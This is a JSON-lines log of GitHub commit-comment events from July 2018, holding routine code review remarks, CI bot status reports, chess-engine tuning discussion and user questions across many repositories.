{"id":"8036205470","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29881689,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-30T08:22:29Z","updated_at":"2018-07-30T08:22:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T08:22:29Z"}
{"id":"8036207806","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29881759,"position":12,"line":12,"path":"DataProvider.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:23:00Z","updated_at":"2018-07-30T08:23:00Z","author_association":"OWNER","body":"Не указан тип данных"}},"created_at":"2018-07-30T08:23:00Z"}
{"id":"8036208870","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29881763,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-30T08:23:14Z","updated_at":"2018-07-30T08:23:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T08:23:14Z"}
{"id":"8036239726","type":"CommitCommentEvent","actor":{"login":"Sidoine"},"repo":{"name":"Sidoine/Ovale"},"payload":{"comment":{"id":29882241,"position":null,"line":null,"path":null,"commit_id":"a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795","created_at":"2018-07-30T08:29:38Z","updated_at":"2018-07-30T08:29:38Z","author_association":"OWNER","body":"Ok, I will look into this, thanks!\n\nLe lun. 30 juil. 2018 à 01:49, ShmooDude <notifications@github.com> a\nécrit :\n\n> @Sidoine <https://github.com/Sidoine> As far as just having ovale\n> functional, I believe the most functional is\n> https://github.com/mwojtkowski/Ovale\n>\n> He's done a bunch of stuff and I just overhauled the equipment module\n> (probably going to do paperdoll next, had it started a little) as well as a\n> few other things. There's just a ton of old stuff in there that's no longer\n> necessary I'm working on going around removing it.\n>\n> If there's particular modules that you're planning on updating that you\n> want me to stay away from let me know, otherwise I'll just keep plugging\n> away.\n>\n> —\n> You are receiving this because you were mentioned.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Sidoine/Ovale/commit/a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795#commitcomment-29877918>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADJE0Dfo2f222U1lHJ5I_5ae8Mu6D0PMks5uLkoigaJpZM4VljG5>\n> .\n>\n"}},"created_at":"2018-07-30T08:29:38Z"}
{"id":"8036241660","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882308,"position":3,"line":3,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:30:02Z","updated_at":"2018-07-30T08:30:02Z","author_association":"OWNER","body":"В namespace закралось имя папки"}},"created_at":"2018-07-30T08:30:02Z"}
{"id":"8036243703","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29882356,"position":1,"line":126,"path":"A-Temperature_logger.ino","commit_id":"c15e961aaebf3704d78f9612c74022215957f839","created_at":"2018-07-30T08:30:25Z","updated_at":"2018-07-30T08:30:25Z","author_association":"OWNER","body":"This is the deepsleep program. It takes a reading every ten seconds. It does not work over wifi, and cannot display any webpages."}},"created_at":"2018-07-30T08:30:25Z"}
{"id":"8036245457","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29882391,"position":14,"line":14,"path":"railway_road/instance_counter.rb","commit_id":"a58058b9410d1c35ff0ef96e117a8c9e7132918d","created_at":"2018-07-30T08:30:45Z","updated_at":"2018-07-30T08:30:45Z","author_association":"NONE","body":"А зачем сеттер?"}},"created_at":"2018-07-30T08:30:45Z"}
{"id":"8036245566","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29882394,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-30T08:30:46Z","updated_at":"2018-07-30T08:30:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T08:30:46Z"}
{"id":"8036247296","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29882415,"position":22,"line":22,"path":"railway_road/instance_counter.rb","commit_id":"a58058b9410d1c35ff0ef96e117a8c9e7132918d","created_at":"2018-07-30T08:31:07Z","updated_at":"2018-07-30T08:31:07Z","author_association":"NONE","body":"self.class.instances += 1"}},"created_at":"2018-07-30T08:31:07Z"}
{"id":"8036255623","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29882508,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T08:32:49Z","updated_at":"2018-07-30T08:32:49Z","author_association":"NONE","body":"@Stefano80 \r\nThe LTC seems to struggle. Because you are on vacation i will have look at further tweaks of the idea (if you doesn't mind).\r\n\r\nFirst we should check where the scaling issue comes from. Independent if the LTC passes i will do a LTC with only four threads.\r\n\r\nThen we can do following comparison:\r\n- STC-4-threads vs LTC-4-threads -> check pure time scaling\r\n- LTC-4-threads vs LTC-8-threads -> check pure threads scaling\r\n\r\nIf we have a time scaling problem probably stronger involvement of completed depth could help (par example a quadratic function in depth).\r\n\r\nIf we have a threads scaling problem the number of threads should be factored in. For more threads the difference of completed depths (and probably scores too) should increase. Here perhaps something like `depth/threads` or probably better `depth/log(threads)` could help to compensate.\r\n\r\nAlso should be measured how scores variance changed under the two scalings. If there something is found we could perhaps compensate.\r\n\r\nBut for now this all speculations!\r\n\r\nWish a nice holiday :-) \r\n(By the way: how long?)"}},"created_at":"2018-07-30T08:32:49Z"}
{"id":"8036257268","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29882527,"position":null,"line":null,"path":null,"commit_id":"7344a0311a788ab7366805a89b5ccc4d73ed8aa6","created_at":"2018-07-30T08:33:10Z","updated_at":"2018-07-30T08:33:10Z","author_association":"CONTRIBUTOR","body":"Woops, dumb mistake with the loadstate.\r\n\r\nWhy didn't you have cbor? Were you missing dependencies due to not running  \"pip install -r requirements.txt\"?"}},"created_at":"2018-07-30T08:33:10Z"}
{"id":"8036260894","type":"CommitCommentEvent","actor":{"login":"vspinu"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29882569,"position":null,"line":null,"path":null,"commit_id":"ba5fdaf63c7da0c43a70d255ba89ce028bf53b85","created_at":"2018-07-30T08:33:57Z","updated_at":"2018-07-30T08:33:57Z","author_association":"MEMBER","body":"Looks good. Thanks."}},"created_at":"2018-07-30T08:33:57Z"}
{"id":"8036265741","type":"CommitCommentEvent","actor":{"login":"sc979"},"repo":{"name":"matth94/centreon-widget-live-top10-cpu-usage"},"payload":{"comment":{"id":29882625,"position":46,"line":111,"path":"live-top10-cpu-usage/index.php","commit_id":"9c4aeefae819fe4e08d05fc40dc85968978eb533","created_at":"2018-07-30T08:34:57Z","updated_at":"2018-07-30T08:34:57Z","author_association":"NONE","body":"We need to protect this one too"}},"created_at":"2018-07-30T08:34:57Z"}
{"id":"8036266159","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882630,"position":36,"line":36,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:35:03Z","updated_at":"2018-07-30T08:35:03Z","author_association":"OWNER","body":"В родителе этот метод называется по-другому"}},"created_at":"2018-07-30T08:35:03Z"}
{"id":"8036269144","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29882662,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T08:35:38Z","updated_at":"2018-07-30T08:35:38Z","author_association":"OWNER","body":"Hi Stefan, I am away for one week and I definitely don't mind if you take over, I would love it actually.\r\n\r\nHave fun!"}},"created_at":"2018-07-30T08:35:38Z"}
{"id":"8036270347","type":"CommitCommentEvent","actor":{"login":"ehudsuryano"},"repo":{"name":"axelnyberg/Backgammon"},"payload":{"comment":{"id":29882680,"position":null,"line":null,"path":null,"commit_id":"c0dc0fba58fc4b78da87ccab0d1a9aa57e3cf2bf","created_at":"2018-07-30T08:35:53Z","updated_at":"2018-07-30T08:35:53Z","author_association":"NONE","body":"great game great code is it possible for you to explain to me the logic behind the numbers in the Model.cs\r\nfor (int i = 0; i < 24; i++)\r\n            {\r\n                if (i < 6)\r\n                    pointX[i] = 363 - (30 * i);\r\n                else if (i > 5 && i < 12)\r\n                    pointX[i] = 333 - (30 * i);\r\n                else if (i > 11 && i < 18)\r\n                    pointX[i] = 3 + (30 * (i % 12));\r\n                else\r\n                    pointX[i] = 33 + (30 * (i % 12));\r\n            }\r\nwhy 363 why 333 what is the logic behind those number \r\nehudsuryano@gmail.com\r\nthank you kind regards"}},"created_at":"2018-07-30T08:35:53Z"}
{"id":"8036270901","type":"CommitCommentEvent","actor":{"login":"ayanmondal"},"repo":{"name":"ayanmondal/cse_phd_comprehensive_iitkgp"},"payload":{"comment":{"id":29882688,"position":null,"line":null,"path":null,"commit_id":"c8eea1c09471a88dfe32dd735cea08ca0068f19f","created_at":"2018-07-30T08:36:00Z","updated_at":"2018-07-30T08:36:00Z","author_association":"OWNER","body":"Updated on July 30, 2018"}},"created_at":"2018-07-30T08:36:00Z"}
{"id":"8036272381","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29882706,"position":17,"line":15,"path":"railway_road/train.rb","commit_id":"a58058b9410d1c35ff0ef96e117a8c9e7132918d","created_at":"2018-07-30T08:36:17Z","updated_at":"2018-07-30T08:36:17Z","author_association":"NONE","body":"Если instances сделать через хэш, где ключом был бы твой id, то тогда это была бы просто выборка по ключу из хэша. Метод будет работать намного быстрее"}},"created_at":"2018-07-30T08:36:17Z"}
{"id":"8036274561","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882732,"position":13,"line":13,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:36:43Z","updated_at":"2018-07-30T08:36:43Z","author_association":"OWNER","body":"Зачем делать эти два свойства публичными?"}},"created_at":"2018-07-30T08:36:43Z"}
{"id":"8036274784","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29882735,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T08:36:46Z","updated_at":"2018-07-30T08:36:46Z","author_association":"NONE","body":"Another aspect is that it may be less common in LTC that threads would disagree on their best moves, thus less effect to show how this patch would make a difference."}},"created_at":"2018-07-30T08:36:46Z"}
{"id":"8036280599","type":"CommitCommentEvent","actor":{"login":"GovindKalyanaMOJ"},"repo":{"name":"Pareis2/PareisPractise"},"payload":{"comment":{"id":29882798,"position":null,"line":null,"path":null,"commit_id":"23b072fdbe871a0c0155c6c3e9eb111988c3ea55","created_at":"2018-07-30T08:37:55Z","updated_at":"2018-07-30T08:37:55Z","author_association":"COLLABORATOR","body":"Avoid this import static org.junit.jupiter.api.Assertions.*;\r\nPlease start implementing real test cases."}},"created_at":"2018-07-30T08:37:55Z"}
{"id":"8036286352","type":"CommitCommentEvent","actor":{"login":"Hchnr"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29882833,"position":6,"line":31,"path":"modules/gui/qt/qml/controlbar/CenterToolbar.qml","commit_id":"c3a18d04dd80665b3d5a1d22cc02ff9520ce360a","created_at":"2018-07-30T08:39:07Z","updated_at":"2018-07-30T08:39:07Z","author_association":"OWNER","body":"Yes. That will be better.\n\n2018-07-30 15:54 GMT+08:00 chubinou <notifications@github.com>:\n\n> Do you think you can factorize/share the button style between the\n> different components\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Hchnr/VLC-qml2/commit/c3a18d04dd80665b3d5a1d22cc02ff9520ce360a#commitcomment-29881098>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AlWD1AImZeu9H7a7mOeM0nkHdN1IT_cRks5uLruagaJpZM4Vl8VT>\n> .\n>\n"}},"created_at":"2018-07-30T08:39:07Z"}
{"id":"8036292663","type":"CommitCommentEvent","actor":{"login":"Ichag"},"repo":{"name":"Ichag/vue-i18n"},"payload":{"comment":{"id":29882841,"position":null,"line":null,"path":null,"commit_id":"112663f06d3b97b64162878e8dbc6e6d31e38b4e","created_at":"2018-07-30T08:40:23Z","updated_at":"2018-07-30T08:40:23Z","author_association":"OWNER","body":"kazupon#402"}},"created_at":"2018-07-30T08:40:23Z"}
{"id":"8036292773","type":"CommitCommentEvent","actor":{"login":"n-peugnet"},"repo":{"name":"n-peugnet/ffff"},"payload":{"comment":{"id":29882842,"position":null,"line":null,"path":null,"commit_id":"1c2e63b28ad1b17124b5dc58a851bcb674e5fa82","created_at":"2018-07-30T08:40:24Z","updated_at":"2018-07-30T08:40:24Z","author_association":"OWNER","body":"fixes #16 "}},"created_at":"2018-07-30T08:40:24Z"}
{"id":"8036297158","type":"CommitCommentEvent","actor":{"login":"GaraYing"},"repo":{"name":"GaraYing/hellodemo"},"payload":{"comment":{"id":29882847,"position":null,"line":null,"path":null,"commit_id":"290c726e1eb5231602add9f759e3cc5d7af12fa7","created_at":"2018-07-30T08:41:18Z","updated_at":"2018-07-30T08:41:18Z","author_association":"OWNER","body":"it's been a day without you my friend"}},"created_at":"2018-07-30T08:41:18Z"}
{"id":"8036298931","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882855,"position":38,"line":38,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:41:40Z","updated_at":"2018-07-30T08:41:40Z","author_association":"OWNER","body":"Надо разнести try на несколько"}},"created_at":"2018-07-30T08:41:40Z"}
{"id":"8036302617","type":"CommitCommentEvent","actor":{"login":"XakepSDK"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":29882865,"position":46,"line":46,"path":"src/main/java/org/spongepowered/api/event/permission/SubjectDataUpdateEvent.java","commit_id":"b909c8c30a37d0ee9dc9205bce23ed5dfc54faaf","created_at":"2018-07-30T08:42:27Z","updated_at":"2018-07-30T08:42:27Z","author_association":"NONE","body":"This event doesn't include, what was changed and in what context. Should it be so? I don't know, how can i use that callback."}},"created_at":"2018-07-30T08:42:27Z"}
{"id":"8036304645","type":"CommitCommentEvent","actor":{"login":"WHMJP"},"repo":{"name":"TheusStremens/Ecg-Recognition-CNN"},"payload":{"comment":{"id":29882870,"position":null,"line":null,"path":null,"commit_id":"bb9b3390a475ffecffa4c7b532aa403b5c119a0c","created_at":"2018-07-30T08:42:53Z","updated_at":"2018-07-30T08:42:53Z","author_association":"NONE","body":"Could you please upload the following three csv_ecg_train.txt, csv_ecg_eval.txt and csv_ecg_test.txt files? Thanks for your help inadvance"}},"created_at":"2018-07-30T08:42:53Z"}
{"id":"8036305810","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882874,"position":60,"line":60,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:43:08Z","updated_at":"2018-07-30T08:43:08Z","author_association":"OWNER","body":"Нет phpdoc"}},"created_at":"2018-07-30T08:43:08Z"}
{"id":"8036307764","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882879,"position":61,"line":61,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:43:31Z","updated_at":"2018-07-30T08:43:31Z","author_association":"OWNER","body":"Public не нужен"}},"created_at":"2018-07-30T08:43:31Z"}
{"id":"8036311068","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882887,"position":61,"line":61,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:44:07Z","updated_at":"2018-07-30T08:44:07Z","author_association":"OWNER","body":"Возвращаемый тип данных"}},"created_at":"2018-07-30T08:44:07Z"}
{"id":"8036317275","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882915,"position":63,"line":63,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:45:20Z","updated_at":"2018-07-30T08:45:20Z","author_association":"OWNER","body":"Нет проверок на случаи, если что-то пойдёт не так как планировалось. Например, заглючил поставщик, отдал невалидный json."}},"created_at":"2018-07-30T08:45:20Z"}
{"id":"8036321220","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29882924,"position":1,"line":8,"path":"A-Temperature_logger.ino","commit_id":"47331c839f953bc82d00883042e581a3cfa4eca0","created_at":"2018-07-30T08:46:07Z","updated_at":"2018-07-30T08:46:07Z","author_association":"OWNER","body":"This is the light sleep program. It takes readings every 15 seconds or so. It can sometimes display the csv files and the web-page but never the graphs"}},"created_at":"2018-07-30T08:46:07Z"}
{"id":"8036322073","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29882925,"position":36,"line":36,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:46:16Z","updated_at":"2018-07-30T08:46:16Z","author_association":"OWNER","body":"Какой тип данных возвращает?"}},"created_at":"2018-07-30T08:46:16Z"}
{"id":"8036327529","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29882933,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T08:47:25Z","updated_at":"2018-07-30T08:47:25Z","author_association":"NONE","body":"@noobpwnftw \r\nYes, that seems a good reason. This should hamper the time scaling.\r\nAnd if we have finally a version to commit we should it also test at 32 threads on your 384-core monster."}},"created_at":"2018-07-30T08:47:25Z"}
{"id":"8036330101","type":"CommitCommentEvent","actor":{"login":"ruflin"},"repo":{"name":"elastic/beats"},"payload":{"comment":{"id":29882957,"position":113,"line":113,"path":"libbeat/cloudid/cloudid.go","commit_id":"bd6981df3e461c5ae34bf62516637f7c03701efd","created_at":"2018-07-30T08:47:56Z","updated_at":"2018-07-30T08:47:56Z","author_association":"COLLABORATOR","body":"@tsg Might be best to answer."}},"created_at":"2018-07-30T08:47:56Z"}
{"id":"8036330737","type":"CommitCommentEvent","actor":{"login":"allsey87"},"repo":{"name":"ilpincy/argos3"},"payload":{"comment":{"id":29882963,"position":null,"line":null,"path":null,"commit_id":"1e96147df00e4d12645b4bcd78c13ce2c75f99f4","created_at":"2018-07-30T08:48:03Z","updated_at":"2018-07-30T08:48:03Z","author_association":"COLLABORATOR","body":"@ilpincy let me know when changes such as this one are made so I can keep my physics engine up to date as well ;)"}},"created_at":"2018-07-30T08:48:03Z"}
{"id":"8036337831","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29883014,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-30T08:49:25Z","updated_at":"2018-07-30T08:49:25Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-30T08:49:25Z"}
{"id":"8036341656","type":"CommitCommentEvent","actor":{"login":"munepi"},"repo":{"name":"Yasunari15/MacTeX-Uninstaller"},"payload":{"comment":{"id":29883026,"position":null,"line":null,"path":null,"commit_id":"086682a29303fc3ab3a48ca761abd049e55cd6c9","created_at":"2018-07-30T08:50:10Z","updated_at":"2018-07-30T08:50:10Z","author_association":"NONE","body":"@Yasunari15 さん＞\r\nさきほど、 (bibunsho7-patch/artwork/Build-icns.sh)[https://github.com/munepi/bibunsho7-patch/blob/master/artwork/Build-icns.sh] のライセンスを明示的に (Public Domain)[http://unlicense.org/] としておきました。\r\nこんなicnsファイルを生成する覚書をご参照くださるのも恐縮です、ます、はい :-) "}},"created_at":"2018-07-30T08:50:10Z"}
{"id":"8036343851","type":"CommitCommentEvent","actor":{"login":"JLHwung"},"repo":{"name":"thymikee/jest-preset-angular"},"payload":{"comment":{"id":29883030,"position":null,"line":null,"path":null,"commit_id":"bc6c523c7b891a7d7143626e34970a8223f99a83","created_at":"2018-07-30T08:50:34Z","updated_at":"2018-07-30T08:50:34Z","author_association":"NONE","body":"Could you publish this commit to npm? Thank you."}},"created_at":"2018-07-30T08:50:34Z"}
{"id":"8036344112","type":"CommitCommentEvent","actor":{"login":"PancaSitorus"},"repo":{"name":"JetBrains/swot"},"payload":{"comment":{"id":29883031,"position":null,"line":null,"path":null,"commit_id":"3a5eaf37e86da99c878e8211e659fafea0b561b9","created_at":"2018-07-30T08:50:38Z","updated_at":"2018-07-30T08:50:38Z","author_association":"NONE","body":"Dear Philip,\r\n\r\nWhy I still can't to apply Jetbrains Products for Learning? The error message is 'Your email address does not belong to any university that we know.'\r\nI am using my institution email -> ifs15022@students.del.ac.id\r\nPlease help.\r\n\r\nThank you"}},"created_at":"2018-07-30T08:50:38Z"}
{"id":"8036349237","type":"CommitCommentEvent","actor":{"login":"aleb"},"repo":{"name":"thiblahute/gst-editing-services"},"payload":{"comment":{"id":29883038,"position":30,"line":90,"path":"tests/check/python/test_clip.py","commit_id":"ecf14ca6d771fbe0fa3713b3f816bb9fc5c17653","created_at":"2018-07-30T08:51:39Z","updated_at":"2018-07-30T08:51:39Z","author_association":"NONE","body":"nitpick: You could name the 2nd and 3rd parameters, because it's not clear when you read the line what they represent"}},"created_at":"2018-07-30T08:51:39Z"}
{"id":"8036349531","type":"CommitCommentEvent","actor":{"login":"mgorny"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":29883040,"position":21,"line":21,"path":"dev-vcs/easygit/easygit-1.7.5.2.ebuild","commit_id":"e9ff6d05e5cbb0695cd9f41697b119218989a56b","created_at":"2018-07-30T08:51:42Z","updated_at":"2018-07-30T08:51:42Z","author_association":"MEMBER","body":"Nit: S is unnecessary here since it's the current directory."}},"created_at":"2018-07-30T08:51:42Z"}
{"id":"8036355385","type":"CommitCommentEvent","actor":{"login":"pavelkryukov"},"repo":{"name":"trexxet/mipt-mips"},"payload":{"comment":{"id":29883060,"position":null,"line":null,"path":null,"commit_id":"73b41d06a7095861582ce9e3932aae6f78dc100a","created_at":"2018-07-30T08:52:51Z","updated_at":"2018-07-30T08:52:51Z","author_association":"NONE","body":"Not sure we need GNU Binutils in the repository again.\r\nIt might be OK to have the sub-module during development, but working with them is a real pain, especially for git beginners."}},"created_at":"2018-07-30T08:52:51Z"}
{"id":"8036356548","type":"CommitCommentEvent","actor":{"login":"mreis1"},"repo":{"name":"xdenser/node-firebird-libfbclient"},"payload":{"comment":{"id":29883073,"position":null,"line":null,"path":null,"commit_id":"d4a61ac37823d2242e193897b556e4378b30ab03","created_at":"2018-07-30T08:53:05Z","updated_at":"2018-07-30T08:53:05Z","author_association":"NONE","body":"I just did some tests and It still doesn't fix the segfault. Here are the error stack.\r\n\r\n`FATAL ERROR: v8::ToLocalChecked Empty MaybeLocal.\r\n 1: node::Abort() [/usr/local/bin/node]\r\n 2: node::FatalException(v8::Isolate*, v8::Local<v8::Value>, v8::Local<v8::Message>) [/usr/local/bin/node]\r\n 3: v8::V8::ToLocalEmpty() [/usr/local/bin/node]\r\n 4: Connection::NewBlobSync(Nan::FunctionCallbackInfo<v8::Value> const&) [/Users/marcio/Dev/heitz-ws/node_modules/firebird/build/Release/binding.node]\r\n 5: Nan::imp::FunctionCallbackWrapper(v8::FunctionCallbackInfo<v8::Value> const&) [/Users/marcio/Dev/heitz-ws/node_modules/firebird/build/Release/binding.node]\r\n 6: v8::internal::FunctionCallbackArguments::Call(void (*)(v8::FunctionCallbackInfo<v8::Value> const&)) [/usr/local/bin/node]\r\n 7: v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) [/usr/local/bin/node]\r\n 8: v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) [/usr/local/bin/node]\r\n 9: 0x20988d38463d\r\n[nodemon] app crashed - waiting for file changes before starting...`"}},"created_at":"2018-07-30T08:53:05Z"}
{"id":"8036358207","type":"CommitCommentEvent","actor":{"login":"aleb"},"repo":{"name":"thiblahute/gst-editing-services"},"payload":{"comment":{"id":29883092,"position":25,"line":85,"path":"tests/check/python/test_clip.py","commit_id":"ecf14ca6d771fbe0fa3713b3f816bb9fc5c17653","created_at":"2018-07-30T08:53:25Z","updated_at":"2018-07-30T08:53:25Z","author_association":"NONE","body":"Maybe put this and everything below in a \r\n```\r\nfor inverted in (False, True):\r\n    vtransition.set_inverted(inverted)\r\n    ...\r\n```"}},"created_at":"2018-07-30T08:53:25Z"}
{"id":"8036361278","type":"CommitCommentEvent","actor":{"login":"CJFJack"},"repo":{"name":"CJFJack/ConfigManager"},"payload":{"comment":{"id":29883112,"position":null,"line":null,"path":null,"commit_id":"f52c8243b6bdcb4c1573cc0fcfe523f7ba1f6804","created_at":"2018-07-30T08:54:00Z","updated_at":"2018-07-30T08:54:00Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-30T08:54:00Z"}
{"id":"8036361762","type":"CommitCommentEvent","actor":{"login":"ganfra"},"repo":{"name":"vector-im/riot-android"},"payload":{"comment":{"id":29883118,"position":13,"line":53,"path":"vector/src/main/java/im/vector/util/SlashCommandsParser.java","commit_id":"0b402d7d6a39a6d2452e652c13f92db94c58101a","created_at":"2018-07-30T08:54:06Z","updated_at":"2018-07-30T08:54:06Z","author_association":"CONTRIBUTOR","body":"Maybe you could use Enum instead of constants. You'll then have your list of commandes with enum.values() "}},"created_at":"2018-07-30T08:54:06Z"}
